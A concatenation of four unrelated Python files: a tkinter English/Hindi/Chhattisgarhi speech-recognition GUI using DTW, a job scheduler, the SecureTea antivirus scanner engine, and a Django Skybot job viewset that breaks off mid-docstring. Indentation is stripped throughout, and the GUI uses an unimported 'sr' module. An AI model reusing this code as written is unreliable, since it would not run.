from tkinter import *
from tkinter import ttk
from tkinter import filedialog
import threading
import time
import os
import numpy as np
import librosa.display
import copy
from sklearn.externals import joblib
from winsound import *
from numpy import array, zeros, argmin, inf, ndim
from scipy.spatial.distance import cdist
import json
import sounddevice as sd
import soundfile as sf
from pydub import AudioSegment
from pydub.silence import split_on_silence
import os
from os import listdir
from os.path import isfile, join
ed = []
with open('eng_dict.json') as data_file:
eng_dict = json.load(data_file)
for i in eng_dict:
ed.append(i)
filename = 'hin_dict'
hin_dict = joblib.load(filename)
###DTW
def dtw(x, y, dist, warp=1):
"""
Computes Dynamic Time Warping (DTW) of two sequences.
:param array x: N1*M array
:param array y: N2*M array
:param func dist: distance used as cost measure
:param int warp: how many shifts are computed.
Returns the minimum distance, the cost matrix, the accumulated cost matrix, and the wrap path.
"""
assert len(x)
assert len(y)
r, c = len(x), len(y)
D0 = zeros((r + 1, c + 1))
D0[0, 1:] = inf
D0[1:, 0] = inf
D1 = D0[1:, 1:] # view
for i in range(r):
for j in range(c):
D1[i, j] = dist(x[i], y[j])
C = D1.copy()
for i in range(r):
for j in range(c):
min_list = [D0[i, j]]
for k in range(1, warp + 1):
i_k = min(i + k, r - 1)
j_k = min(j + k, c - 1)
min_list += [D0[i_k, j], D0[i, j_k]]
D1[i, j] += min(min_list)
if len(x)==1:
path = zeros(len(y)), range(len(y))
elif len(y) == 1:
path = range(len(x)), zeros(len(x))
else:
path = _traceback(D0)
return D1[-1, -1] / sum(D1.shape), C, D1, path
def accelerated_dtw(x, y, dist, warp=1):
"""
Computes Dynamic Time Warping (DTW) of two sequences in a faster way.
Instead of iterating through each element and calculating each distance,
this uses the cdist function from scipy (https://docs.scipy.org/doc/scipy/reference/generated/scipy.spatial.distance.cdist.html)
:param array x: N1*M array
:param array y: N2*M array
:param string or func dist: distance parameter for cdist. When string is given, cdist uses optimized functions for the distance metrics.
If a string is passed, the distance function can be 'braycurtis', 'canberra', 'chebyshev', 'cityblock', 'correlation', 'cosine', 'dice', 'euclidean', 'hamming', 'jaccard', 'kulsinski', 'mahalanobis', 'matching', 'minkowski', 'rogerstanimoto', 'russellrao', 'seuclidean', 'sokalmichener', 'sokalsneath', 'sqeuclidean', 'wminkowski', 'yule'.
:param int warp: how many shifts are computed.
Returns the minimum distance, the cost matrix, the accumulated cost matrix, and the wrap path.
"""
assert len(x)
assert len(y)
if ndim(x) == 1:
x = x.reshape(-1, 1)
if ndim(y) == 1:
y = y.reshape(-1, 1)
r, c = len(x), len(y)
D0 = zeros((r + 1, c + 1))
D0[0, 1:] = inf
D0[1:, 0] = inf
D1 = D0[1:, 1:]
D0[1:, 1:] = cdist(x, y, dist)
C = D1.copy()
for i in range(r):
for j in range(c):
min_list = [D0[i, j]]
for k in range(1, warp + 1):
min_list += [D0[min(i + k, r - 1), j],
D0[i, min(j + k, c - 1)]]
D1[i, j] += min(min_list)
if len(x) == 1:
path = zeros(len(y)), range(len(y))
elif len(y) == 1:
path = range(len(x)), zeros(len(x))
else:
path = _traceback(D0)
return D1[-1, -1] / sum(D1.shape), C, D1, path
def _traceback(D):
i, j = array(D.shape) - 2
p, q = [i], [j]
while (i > 0) or (j > 0):
tb = argmin((D[i, j], D[i, j+1], D[i+1, j]))
if tb == 0:
i -= 1
j -= 1
elif tb == 1:
i -= 1
else: # (tb == 2):
j -= 1
p.insert(0, i)
q.insert(0, j)
return array(p), array(q)
###DTW-End
reply = 0
entries = {}
textbs = {}
textpops = ""
test_files = []
current_test = ""
cg_dirname = ""
flag_audio_pop = 0
def language_selection_window(a):
global reply
e = entries["mic"]
reply = int(e.get())
# print(reply)
def enghin(a):
# global entries
# print(entries)
# e = entries["mic"]
# rep = int(e.get())
# print(rep)
global reply
rep = reply
# print(rep)
mic_list = sr.Microphone.list_microphone_names()
j = 1
mic_name = ""
sample_rate = 48000
chunk_size = 2048
for i, microphone_name in enumerate(mic_list):
# print(j,microphone_name)
if j == rep:
mic_name = microphone_name
# print("MIC",mic_name)
j += 1
r = sr.Recognizer()
mic_list = sr.Microphone.list_microphone_names()
for i, microphone_name in enumerate(mic_list):
if microphone_name == mic_name:
device_id = i
# print("HELL",device_id)
def exitf(a):
root.destroy()
def status_popup():
global textpops
savp = Tk()
savp.iconbitmap('wait.ico')
savp.wm_title("Recognition in progress...")
# Label(savp, text="Please wait...").grid(row=1, column=0, sticky="ew")
prog = Text(savp, height=10, width=40, bd=5, font=("Times", 20))
prog.grid(row=2, columnspan=3, sticky="ew")
# print("txtpps - ", textpops)
prog.insert(INSERT, " Recognition in progress, Please wait! \n")
prog.insert(INSERT, " Loading! \n")
start = time.time()
while not textpops:
if (time.time() - start) > 5:
break
prog.insert(INSERT, ".")
savp.update_idletasks()
savp.update()
textpops = ""
def speakeng(a):
with sr.Microphone(device_index=device_id, sample_rate=sample_rate, chunk_size=chunk_size) as source:
# Adjusting noise level
r.adjust_for_ambient_noise(source)
audio = r.listen(source)
global textpops
t1 = threading.Thread(target=status_popup)
t1.start()
try:
text = r.recognize_google(audio, language='en-IN')
textpops = text
# print("Speakeng - ",textpops)
text = text + "\n"
eng.insert(INSERT, text)
except sr.UnknownValueError:
text = "\n---\nGoogle Speech Recognition could not understand audio\n---\n"
eng.insert(INSERT, text)
except sr.RequestError as e:
eng.insert(INSERT, "---")
eng.insert(INSERT,
"Could not request results from Google Speech Recognition service; {0}".format(e))
eng.insert(INSERT, "---")
t1.join()
# print("\nt1 still alive - ", t1.is_alive())
def speakhin(a):
with sr.Microphone(device_index=device_id, sample_rate=sample_rate, chunk_size=chunk_size) as source:
# Adjusting noise level
r.adjust_for_ambient_noise(source)
audio = r.listen(source)
global textpops
t1 = threading.Thread(target=status_popup)
t1.start()
try:
text = r.recognize_google(audio, language='hi-IN')
textpops = text
# print("Speakhin - ", textpops)
text = text + "\n"
hin.insert(INSERT, text)
except sr.UnknownValueError:
text = "\n---\nGoogle Speech Recognition could not understand audio\n---\n"
hin.insert(INSERT, text)
except sr.RequestError as e:
hin.insert(INSERT, "---")
hin.insert(INSERT,
"Could not request results from Google Speech Recognition service; {0}".format(e))
hin.insert(INSERT, "---")
t1.join()
# print("\nt1 still alive - ", t1.is_alive())
def cleareng(a):
eng.delete(1.0, END)
def clearhin(a):
hin.delete(1.0, END)
def saveeng(a):
location = ""
def browse(a):
x = filedialog.askdirectory()
e = entries["save_file_location"]
e.insert(0, x)
location = x
def savv(a):
e = entries["save_file_location"]
location = str(e.get())
e = entries["save_file_name"]
name = str(e.get())
input = eng.get("1.0", 'end-1c')
# print(name)
loc = location + "/" + name + ".txt"
# print("\nFinal loc\n", loc)
f = open(loc, 'w')
f.write(input)
f.close()
sav.destroy()
sav = Tk()
sav.iconbitmap('save.ico')
sav.wm_title("Save English Transcript")
Label(sav, text="Enter the file name you want: ").grid(row=0, column=0, sticky=W)
e = Entry(sav, width=50)
e.grid(row=1, columnspan=2, sticky="ew")
entries["save_file_name"] = e
Label(sav, text="Choose the location to save at: ").grid(row=2, column=0, sticky=W)
folentry = Entry(sav, width=77)
folentry.grid(row=3, column=0, sticky="ew")
entries["save_file_location"] = folentry
ch = Button(sav, text="Browse")
ch.bind("<Button-1>", browse)
ch.grid(row=3, column=1, sticky="ew")
ttk.Separator(sav).grid(row=4, pady=2, padx=2, columnspan=3, sticky="ew")
ent = Button(sav, text="Save", width=11)
ent.bind("<Button-1>", savv)
ent.grid(row=5, column=1, sticky="ew")
sav.mainloop()
def savehin(a):
location = ""
def browse(a):
x = filedialog.askdirectory()
e = entries["save_file_location"]
e.insert(0, x)
location = x
def savv(a):
e = entries["save_file_location"]
location = str(e.get())
e = entries["save_file_name"]
name = str(e.get())
input = hin.get("1.0", 'end-1c')
# print(name)
loc = location + "/" + name + ".txt"
# print("\nFinal loc\n", loc)
f = open(loc, 'w', encoding="utf-8")
f.write(input)
f.close()
sav.destroy()
sav = Tk()
sav.iconbitmap('save.ico')
sav.wm_title("Save Hindi Transcript")
Label(sav, text="Enter the file name you want: ").grid(row=0, column=0, sticky=W)
e = Entry(sav, width=50)
e.grid(row=1, columnspan=2, sticky="ew")
entries["save_file_name"] = e
Label(sav, text="Choose the location to save at: ").grid(row=2, column=0, sticky=W)
folentry = Entry(sav, width=77)
folentry.grid(row=3, column=0, sticky="ew")
entries["save_file_location"] = folentry
ch = Button(sav, text="Browse")
ch.bind("<Button-1>", browse)
ch.grid(row=3, column=1, sticky="ew")
ttk.Separator(sav).grid(row=4, pady=2, padx=2, columnspan=3, sticky="ew")
ent = Button(sav, text="Save", width=11)
ent.bind("<Button-1>", savv)
ent.grid(row=5, column=1, sticky="ew")
sav.mainloop()
win.destroy()
root = Tk()
root.iconbitmap('icon.ico')
root.title("English and Hindi Voice Typing Editor")
Label(root, text="English Speech to text:").grid(row=0, column=0, sticky=W)
eng = Text(root, height=12, width=72, bd=5, font=("Times", 12))
eng.grid(row=3, columnspan=3)
se = Button(root, text="Speak English", width=11)
se.bind("<Button-1>", speakeng)
se.grid(row=6, column=0)
es = Button(root, text="Clear English", width=11)
es.bind("<Button-1>", cleareng)
es.grid(row=6, column=1)
ce = Button(root, text="Save English", width=11)
ce.bind("<Button-1>", saveeng)
ce.grid(row=6, column=2)
Label(root, text="Hindi Speech to text:").grid(row=7, column=0, sticky=W)
hin = Text(root, height=12, width=72, bd=5, font=("Times", 12))
hin.grid(row=10, columnspan=3)
sh = Button(root, text="Speak Hindi", width=11)
sh.bind("<Button-1>", speakhin)
sh.grid(row=13, column=0)
hs = Button(root, text="Clear Hindi", width=11)
hs.bind("<Button-1>", clearhin)
hs.grid(row=13, column=1)
ch = Button(root, text="Save Hindi", width=11)
ch.bind("<Button-1>", savehin)
ch.grid(row=13, column=2)
ttk.Separator(root).grid(row=14, pady=2, padx=2, columnspan=3, sticky="ew")
ex = Button(root, text="Exit", width=11)
ex.bind("<Button-1>", exitf)
ex.grid(row=16, columnspan=3, sticky="ew")
root.mainloop()
def exitwin(a):
win.destroy()
def test_folder(a):
def cg(a):
mfcc_arr = joblib.load('Training_mfcc_arr.pkl')
y = joblib.load('Training_y.pkl')
def exitcg(a):
cgroot.destroy()
def preprocess_mfcc(mfcc):
mfcc_cp = copy.deepcopy(mfcc)
for i in range(mfcc.shape[1]):
mfcc_cp[:, i] = mfcc[:, i] - np.mean(mfcc[:, i])
mfcc_cp[:, i] = mfcc_cp[:, i] / np.max(np.abs(mfcc_cp[:, i]))
return mfcc_cp
def audio_popup():
def play(a):
file = cg_dirname + "/" + current_test
PlaySound(file, SND_FILENAME | SND_ASYNC)
def exi(a):
global flag_audio_pop
flag_audio_pop = 1
savp.destroy()
savp = Tk()
savp.iconbitmap('audio.ico')
savp.wm_title("Audio Player")
Label(savp,
text="Click on Play to play the following Audio file:\n" + current_test + "\nClick on Exit to close this window.").grid(
row=1, column=0, sticky="ew")
se = Button(savp, text="Play", width=11)
se.bind("<Button-1>", play)
se.grid(row=2, column=0)
es = Button(savp, text="Exit", width=11)
es.bind("<Button-1>", exi)
es.grid(row=2, column=1)
savp.mainloop()
def recognize_mic(a):
fs = 44100
duration = 5 # seconds
myrecording = sd.rec(duration * fs, samplerate=fs, channels=2, dtype='float64')
print("Recording Audio")
sd.wait()
print("Audio recording complete , Play Audio")
sf.write("temp.wav", myrecording, fs)
sd.wait()
print("Play Audio Complete")
AudioSegment.ffmpeg = "C://ffmpeg//bin"
cwd = os.getcwd()
loc = cwd + "\\" + "temp.wav"
sound_file = AudioSegment.from_wav(loc)
audio_chunks = split_on_silence(sound_file,
# must be silent for at least half a second
min_silence_len=250,
# consider it silent if quieter than -16 dBF
silence_thresh=-38
)
print("Hello")
for i, chunk in enumerate(audio_chunks):
out_file = cwd + "\\" + "temp\\temp_{0}.wav".format(i)
print(i)
if i < 10:
out_file = cwd + "\\" + "temp\\temp_0{0}.wav".format(i)
print("exporting", out_file)
chunk.export(out_file, format="wav")
foldname = cwd + "\\" + "temp"
onlyfiles = [f for f in listdir(foldname) if isfile(join(foldname, f))]
answer = ""
for i in onlyfiles:
# start = time.perf_counter()
yTest, srTest = librosa.load(foldname + "/" + i)
mfccTest = librosa.feature.mfcc(yTest, srTest)
mfccTest = preprocess_mfcc(mfccTest)
dists = []
for i in range(len(mfcc_arr)):
mfcci = mfcc_arr[i]
disti = dtw(mfcci.T, mfccTest.T, dist=lambda x, y: np.exp(np.linalg.norm(x - y, ord=1)))[0]
dists.append(disti)
# plt.plot(dists)
min_dist = min(dists)
min_dist_index = dists.index(min_dist)
pre = int(y[min_dist_index])
output = hin_dict[pre]
answer = answer + " " + output
mi.insert(INSERT, answer)
def recognize_all(a):
start = time.perf_counter()
dirname = cg_dirname
files = test_files
Test_Result = []
Reult_indices = []
for j in range(len(files)):
start1 = time.perf_counter()
yTest, srTest = librosa.load(dirname + "/" + files[j])
mfccTest = librosa.feature.mfcc(yTest, srTest)
mfccTest = preprocess_mfcc(mfccTest)
dists = []
for i in range(len(mfcc_arr)):
mfcci = mfcc_arr[i]
disti = dtw(mfcci.T, mfccTest.T, dist=lambda x, y: np.exp(np.linalg.norm(x - y, ord=1)))[0]
dists.append(disti)
min_dist = min(dists)
min_dist_index = dists.index(min_dist)
pre = int(y[min_dist_index])
output = hin_dict[pre]
tt = time.perf_counter() - start1
output = "Input File : " + current_test + ".\nThe spoken word is : " + output + ".\nTime taken for Recognition : " + str(tt) + "\n"
micl.insert(INSERT, output)
Test_Result.append(hin_dict[pre])
Reult_indices.append(pre)
# print(hin_dict[pre])
tt = time.perf_counter() - start
output = "\nTotal Time taken for Recognizing "+str(len(test_files))+" Testing files : " +str(tt) + "\n"
micl.insert(INSERT, output)
#Accuracy
j=0
correct = 0
total_files = len(test_files)
#Precision
precisions = np.array([0]*58)
num = [0] * 58
den = [0] * 58
for i in range(len(Test_Result)):
den[Reult_indices[i]] += 1
lis = list(files[i].split('_'))
# print(eng_dict)
index = ed.index(str(lis[0]))
# print(index)
if Reult_indices[i] == index:
num[Reult_indices[i]] += 1
# print("Precisions word-wise:")
for i in range(58):
try:
precisions[i] = (num[i] / den[i]) * 100
except:
precisions[i] = -1
pass
prc = np.array(precisions)
np.save("precisions",prc)
for i in test_files:
lis = list(i.split('_'))
index = ed.index(str(lis[0]))
true_value = hin_dict[index]
if Test_Result[j]==true_value:
correct+=1
j+=1
accuracy = (correct/total_files)*100
output = "\nAccuracy of the complete Recognition : " + str(correct) + " out of " + str(total_files) + ".\nAccuracy percentage : "+str(accuracy)+"\n"
anarray = [0,0]
anarray = np.array(anarray)
np.save("accuracy",anarray)
micl.insert(INSERT, output)
def selected_from_dd(*args):
global current_test
current_test = tkvar.get()
t1 = threading.Thread(target=audio_popup)
t1.start()
start = time.perf_counter()
yTest, srTest = librosa.load(cg_dirname + "/" + current_test)
mfccTest = librosa.feature.mfcc(yTest, srTest)
mfccTest = preprocess_mfcc(mfccTest)
dists = []
for i in range(len(mfcc_arr)):
mfcci = mfcc_arr[i]
disti = dtw(mfcci.T, mfccTest.T, dist=lambda x, y: np.exp(np.linalg.norm(x - y, ord=1)))[0]
dists.append(disti)
# plt.plot(dists)
min_dist = min(dists)
min_dist_index = dists.index(min_dist)
pre = int(y[min_dist_index])
output = hin_dict[pre]
tt = time.perf_counter()-start
output = "Input File : "+str(current_test)+".\nThe spoken word is : "+str(output)+".\nTime taken for Recognition : "+str(tt)+"\n"
sop.insert(INSERT, output)
global flag_audio_pop
if flag_audio_pop == 1:
t1.join()
flag_audio_pop = 0
fol.destroy()
cgroot = Tk()
cgroot.iconbitmap('icon.ico')
tkvar = StringVar(cgroot)
cgroot.title("Chhattisgarhi Small Vocabulary Speech Recognition")
drop_down_menu = OptionMenu(cgroot, tkvar, *test_files)
Label(cgroot, text="Recognize a single file, Choose from below: ").grid(row=0, columnspan=2, sticky="w")
drop_down_menu.grid(row=2, column=1, sticky="ew")
tkvar.trace('w', selected_from_dd)
sop = Text(cgroot, height=6, width=60, bd=5, font=("Times", 12))
sop.grid(row=2, column=0)
ttk.Separator(cgroot).grid(row=3, pady=2, padx=2, columnspan=3, sticky="ew")
Label(cgroot, text="Recognize all the Audio files of Test folder: ").grid(row=4, columnspan=2, sticky="w")
micl = Text(cgroot, height=6, width=60, bd=5, font=("Times", 12))
micl.grid(row=5, column=0, sticky="w")
reczall = Button(cgroot, text="Recognize All", width=11)
reczall.bind("<Button-1>", recognize_all)
reczall.grid(row=5, column=1, sticky="ew")
ttk.Separator(cgroot).grid(row=6, pady=2, padx=2, columnspan=3, sticky="ew")
Label(cgroot, text="Recognize through Mic (5-second recording): ").grid(row=7, columnspan=2, sticky="w")
mi = Text(cgroot, height=6, width=60, bd=5, font=("Times", 12))
mi.grid(row=8, column=0, sticky="w")
recmic = Button(cgroot, text="Recognize", width=11)
recmic.bind("<Button-1>", recognize_mic)
recmic.grid(row=9, column=1, sticky="ew")
ttk.Separator(cgroot).grid(row=10, pady=2, padx=2, columnspan=3, sticky="ew")
ex = Button(cgroot, text="Exit", width=11)
ex.bind("<Button-1>", exitcg)
ex.grid(row=11, columnspan=3, sticky="ew")
cgroot.mainloop()
def askfolder(a):
global cg_dirname
cg_dirname = filedialog.askdirectory()
folentry.insert(0, cg_dirname)
global test_files
test_files = [f for f in os.listdir(cg_dirname) if os.path.isfile(os.path.join(cg_dirname,f))]
if "desktop.ini" in test_files:
test_files.remove("desktop.ini")
# print(test_files)
win.destroy()
fol = Tk()
fol.iconbitmap('save.ico')
fol.title("Testing Folder Selection")
Label(fol, text="Choose the folder containing Testing Audio files:").grid(row=0, column=0, sticky=W)
folentry = Entry(fol, width=77)
folentry.grid(row=1, sticky=W, column=0)
ch = Button(fol, text="Browse")
ch.bind("<Button-1>", askfolder)
ch.grid(row=1, column=1, sticky=E)
ch = Button(fol, text="Next")
ch.bind("<Button-1>", cg)
ch.grid(row=2, columnspan=2, sticky="ew")
fol.mainloop()
popup.destroy()
win = Tk()
win.iconbitmap('icon.ico')
win.title("Select the language for Recognition")
Label(win, text="English/Hindi Speech to text:").grid(row=0, column=0, sticky=W)
se = Button(win, text="English/Hindi", width=11)
se.bind("<Button-1>", enghin)
se.grid(row=0, column=1, sticky="ew")
ttk.Separator(win).grid(row=2, pady=2, padx=2, columnspan=3, sticky="ew")
Label(win, text="Chhattisgarhi Small Vocabulary Recognition(Words listed below):").grid(row=4, column=0, sticky=W)
words = Text(win, height=4, width=60, bd=5, font=("Times", 12))
words.grid(row=6, column=0)
words.insert(INSERT, "'आबे', 'बईठ', 'बेरा', 'एती', 'गोड़', 'हमर', 'हे', 'जाहूँ', 'काबर', 'कहत', 'करत', 'खाबे', 'कोति', 'लइका','मोर', 'पीरात', 'रेंगत', 'टेरत', 'टूरा', 'तुमन'")
sh = Button(win, text="Chhattisgarhi", width=11)
sh.bind("<Button-1>", test_folder)
sh.grid(row=6, column=1, sticky="ew")
ttk.Separator(win).grid(row=10, pady=2, padx=2, columnspan=3, sticky="ew")
exx = Button(win, text="Exit", width=11)
exx.bind("<Button-1>", exitwin)
exx.grid(row=12, columnspan=3, sticky="ew")
win.mainloop()
def genlist(a):
mic_list = sr.Microphone.list_microphone_names()
j = 1
li = ""
for i, microphone_name in enumerate(mic_list):
temp = str(j)
temp = temp + " - " + microphone_name + "\n"
li = li + temp
j += 1
# print("\ngenlist's --\n",li)
e = textbs["miclist"]
# print("\ninslist's --\n", li)
e.insert(INSERT, li)
popup = Tk()
popup.iconbitmap('mic.ico')
popup.wm_title("Microphone Confirmation")
Label(popup, text="Enter the serial number of the appropriate mic from the following list").grid(row=0,column=0,sticky=W)
micl = Text(popup, height=6, width=30, bd=9, font=("Times", 12))
micl.grid(row=1, columnspan=1, sticky = "ew")
textbs["miclist"] = micl
gl = Button(popup, text="Generate list", width=11)
gl.bind("<Button-1>",genlist)
gl.grid(row=1, column=1, sticky = "ew")
e = Entry(popup,width = 50)
e.grid(row=7,sticky = "ew")
entries["mic"] = e
ent = Button(popup, text="Submit", width=11)
ent.bind("<Button-1>", language_selection_window)
ent.grid(row=7, column=1, sticky = "ew")
popup.mainloop()
|
main.py
|
import schedule
import time
import threading
import logging.config
from schedinstances.TextFileURLs import TextFileURLs
from schedinstances.ArtPackages import ArtPackages
from schedinstances.ArtMails import ArtMails, ArtDevMails
from schedinstances.BigTasks import BigTasks
from schedinstances.Harvester import Harvester
from schedinstances.SQLAggregator import SQLAggregator
from schedinstances.SQLAggregatorCampaign import SQLAggregatorCampaign
from schedinstances.PandaLogsStorageCleanUp import PandaLogsStorageCleanUp
from schedinstances.GrafanaPlots import GrafanaPlots
from schedinstances.DataCarouselPrestageCollector import DataCarouselPrestageCollector
from schedinstances.MLFlowCleanup import MLFlowCleanup
from schedinstances.DataCarouselMails import DataCarouselMails
from settingscron import EXECUTION_CAP_FOR_MAINMENUURLS
from settingscron import LOG_PATH
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
logging.basicConfig(level=logging.DEBUG, filename=LOG_PATH, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
mainMenuURLs = TextFileURLs(EXECUTION_CAP_FOR_MAINMENUURLS)
infrequentURLS = TextFileURLs(EXECUTION_CAP_FOR_MAINMENUURLS)
infrequentURLS.setInputFile("infrequenturls.txt")
artPackages = ArtPackages(EXECUTION_CAP_FOR_MAINMENUURLS)
artMails = ArtMails(EXECUTION_CAP_FOR_MAINMENUURLS)
artDevMails = ArtDevMails(EXECUTION_CAP_FOR_MAINMENUURLS)
bigTasks = BigTasks(EXECUTION_CAP_FOR_MAINMENUURLS)
harvester = Harvester(EXECUTION_CAP_FOR_MAINMENUURLS)
grafanaPlots = GrafanaPlots(EXECUTION_CAP_FOR_MAINMENUURLS)
cephCleanUp = PandaLogsStorageCleanUp()
sQLAggregator = SQLAggregator()
sQLAggregatorCampaign = SQLAggregatorCampaign()
stageProgressCollector = DataCarouselPrestageCollector()
mlFlowCleanUp = MLFlowCleanup()
# dataCaruselMails = DataCarouselMails(EXECUTION_CAP_FOR_MAINMENUURLS)
def run_threaded(job_func):
job_thread = threading.Thread(target=job_func)
job_thread.daemon = True
job_thread.start()
schedule.every(10).minutes.do(run_threaded, mainMenuURLs.execute)
schedule.every(10).minutes.do(run_threaded, bigTasks.execute)
schedule.every(10).minutes.do(run_threaded, harvester.execute)
schedule.every(10).minutes.do(run_threaded, artPackages.execute)
schedule.every(1).hours.do(run_threaded, artDevMails.execute)
schedule.every(1).hours.do(run_threaded, sQLAggregator.execute)
schedule.every(1).hours.do(run_threaded, sQLAggregatorCampaign.execute)
schedule.every().hour.at(":05").do(run_threaded, grafanaPlots.execute)
schedule.every(2).hours.do(run_threaded, infrequentURLS.execute)
schedule.every().day.at("20:18").do(run_threaded, cephCleanUp.execute)
schedule.every().day.at("07:00").do(run_threaded, artMails.execute) # UTC
schedule.every().day.at("10:00").do(run_threaded, artMails.execute) # UTC
schedule.every(2).hours.do(run_threaded, stageProgressCollector.execute)
schedule.every(10).minutes.do(run_threaded, mlFlowCleanUp.execute)
# schedule.every(1).hours.do(run_threaded, dataCaruselMails.execute)
while 1:
schedule.run_pending()
time.sleep(1)
"""
Install:
schedule
"""
|
scanner_engine.py
|
# -*- coding: utf-8 -*-
u"""Scanner Engine module for SecureTea AntiVirus.
Project:
╔═╗┌─┐┌─┐┬ ┬┬─┐┌─┐╔╦╗┌─┐┌─┐
╚═╗├┤ │ │ │├┬┘├┤ ║ ├┤ ├─┤
╚═╝└─┘└─┘└─┘┴└─└─┘ ╩ └─┘┴ ┴
Author: Abhishek Sharma <abhishek_official@hotmail.com> , Jul 4 2019
Version: 1.4
Module: SecureTea
"""
from securetea.lib.antivirus.scanner.hash_scanner import HashScanner
from securetea.lib.antivirus.scanner.yara_scanner import YaraScanner
from securetea.lib.antivirus.scanner.clamav_scanner import ClamAVScanner
from securetea.lib.antivirus.antivirus_logger import AntiVirusLogger
import multiprocessing
import sys
class ScannerEngine(object):
"""ScannerEngine class."""
def __init__(self, debug=False, config_path=None, vt_api_key=None, file_list=None):
"""
Initialize ScannerEngine.
Args:
debug (bool): Log on terminal or not
config_path (str): Configuration JSON file path
vt_api_key (str): VirusTotal API Key
file_list (list): List of files to scan
Raises:
None
Returns:
None
"""
# Initialize logger
self.logger = AntiVirusLogger(
__name__,
debug=debug
)
if config_path is not None:
self._CONFIG_PATH = config_path
else:
self.logger.log(
"Configuration file path not found.",
logtype="error"
)
sys.exit(0)
if file_list:
self.file_list = file_list
else:
# Initialize an empty list
self.file_list = []
# Create HashScanner object
self.hash_scanner = HashScanner(debug=debug,
config_path=self._CONFIG_PATH,
file_list=self.file_list,
vt_api_key=vt_api_key)
# Create YaraScanner object
self.yara_scanner = YaraScanner(debug=debug,
config_path=self._CONFIG_PATH,
file_list=self.file_list,
vt_api_key=vt_api_key)
# Create ClamAVScanner object
self.clamd_scanner = ClamAVScanner(debug=debug,
config_path=self._CONFIG_PATH,
file_list=self.file_list,
vt_api_key=vt_api_key)
# List of process in action
self.process_pool = []
def start_scanner_engine(self):
"""
Start the scanner engine and stat scanning
the files using three (3) engines in a multi-processing
environment.
1. Hash Scanner Engine
2. Yara Scanner Engine
3. Clam AV Scanner Engine
Args:
None
Raises:
None
Returns:
None
"""
try:
# Create Hash Scanner process
hash_scanner_process = multiprocessing.Process(target=self.hash_scanner.start_scan)
# Create Yara Scanner process
yara_scanner_process = multiprocessing.Process(target=self.yara_scanner.start_scan)
# Create Clam AV Scanner process
clamd_scanner_process = multiprocessing.Process(target=self.clamd_scanner.start_scan)
# Add Hash Scanner process to process list
self.process_pool.append(hash_scanner_process)
# Add Yara Scanner process to process list
self.process_pool.append(yara_scanner_process)
# Add Clamd AV process to process list
self.process_pool.append(clamd_scanner_process)
# Start Hash Scanner process
hash_scanner_process.start()
self.logger.log(
"Hash Scanner engine started",
logtype="info"
)
# Start Yara Scanner process
yara_scanner_process.start()
self.logger.log(
"Yara Scanner engine started",
logtype="info"
)
clamd_scanner_process.start()
self.logger.log(
"Clam AV Scanner engine started",
logtype="info"
)
# Complete the process
for process in self.process_pool:
process.join()
return True
except KeyboardInterrupt:
for process in self.process_pool:
process.terminate()
return True
except Exception as e:
self.logger.log(
"Error occurred: " + str(e),
logtype="error"
)
return True
|
skybot_job.py
|
import json
import os
from datetime import datetime, timedelta
import pandas as pd
from rest_framework import mixins, viewsets
from rest_framework.decorators import action
from rest_framework.response import Response
from common.dates_interval import get_days_interval
from common.read_csv import csv_to_dataframe
from des.dao import CcdDao, DesSkybotJobResultDao, ExposureDao
from des.models import SkybotJob
from des.serializers import SkybotJobSerializer
from des.skybot.pipeline import DesSkybotPipeline
import numpy as np
from des.summary import SummaryResult
import threading
class SkybotJobViewSet(mixins.RetrieveModelMixin,
mixins.ListModelMixin,
viewsets.GenericViewSet):
"""
Este end point esta com os metodos de Create, Update, Delete desabilitados.
estas operações vão ficar na responsabilidades do pipeline des/skybot.
o Endpoint submit_job é responsavel por iniciar o pipeline que será executado em background.
"""
queryset = SkybotJob.objects.all()
serializer_class = SkybotJobSerializer
ordering_fields = ('id', 'status', 'start', 'finish')
ordering = ('-start',)
def estimate_execution_time(self, to_execute):
dao = DesSkybotJobResultDao(pool=False)
se = dao.skybot_estimate()
try:
average_time = se['t_exec_time'] / int(se['total'])
estimated_time = (int(to_execute) * average_time).total_seconds()
except:
estimated_time = 0
return estimated_time
@action(detail=False, methods=['post'])
def submit_job(self, request, pk=None):
"""
Este endpoint apenas cria um novo registro na tabela Des/Skybot Jobs.
O Job é criado com status idle. uma daemon verifica
de tempos em tempos os jobs neste status e inicia o processamento.
Parameters:
date_initial (datetime): data inicial usada para selecionar as exposições que serão processadas.
date_final (datetime): data Final usado para selecionar as exposições que serão processadas
Returns:
job (SkybotJobSerializer): Job que acabou de ser criado.
"""
params = request.data
date_initial = params['date_initial']
date_final = params['date_final']
# Recuperar o usuario que submeteu o Job.
owner = self.request.user
# adicionar a hora inicial e final as datas
start = datetime.strptime(
date_initial, '%Y-%m-%d').strftime("%Y-%m-%d 00:00:00")
end = datetime.strptime(
date_final, '%Y-%m-%d').strftime("%Y-%m-%d 23:59:59")
# Total de exposures não executadas no Periodo.
t_exposures = DesSkybotJobResultDao(
pool=False).count_not_exec_by_period(start, end)
# TODO: Esses totais deveriam ser de Noites com exposições não executadas.
# Recuperar o total de noites com exposição no periodo
t_nights = ExposureDao(
pool=False).count_not_exec_nights_by_period(start, end)
# Recuperar o total de ccds no periodo.
# TODO: Esses totais deveriam ser de CCDs com exposições não executadas.
t_ccds = CcdDao(pool=False).count_not_exec_ccds_by_period(start, end)
# Estimativa de tempo baseada na qtd de exposures a serem executadas.
estimated_time = self.estimate_execution_time(t_exposures)
# Criar um model Skybot Job
job = SkybotJob(
owner=owner,
date_initial=date_initial,
date_final=date_final,
# Job começa com Status Idle.
status=1,
# Total de exposures a serem executadas.
exposures=t_exposures,
# Total de noites com exposições.
nights=t_nights,
# Total de CCDs no periodo.
ccds=t_ccds,
# Tempo de execução estimado
estimated_execution_time=timedelta(seconds=estimated_time)
)
job.save()
result = SkybotJobSerializer(job)
return Response(result.data)
@action(detail=True, methods=['post'])
def cancel_job(self, request, pk=None):
"""
Aborta um Skybot job,
cria um arquivo com o status 'aborted' e as daemons do pipeline checam este status e cancelam a execução.
"""
job = self.get_object()
# Se o job estiver idle=1 ou running=2
if job.status <= 2:
# Criar um arquivo no diretório do Job para indicar ao pipeline que foi abortado.
data = dict({
'status': 'aborted',
})
filepath = os.path.join(job.path, 'status.json')
with open(filepath, 'w') as f:
json.dump(data, f)
result = SkybotJobSerializer(job)
return Response(result.data)
@action(detail=True)
def heartbeat(self, request, pk=None):
"""
Este endpoint monitora o progresso de um job.
O Job cria dois arquivos: request_heartbeat.json e loaddata_heartbeat.json e vai salvando o progresso.
Parameters:
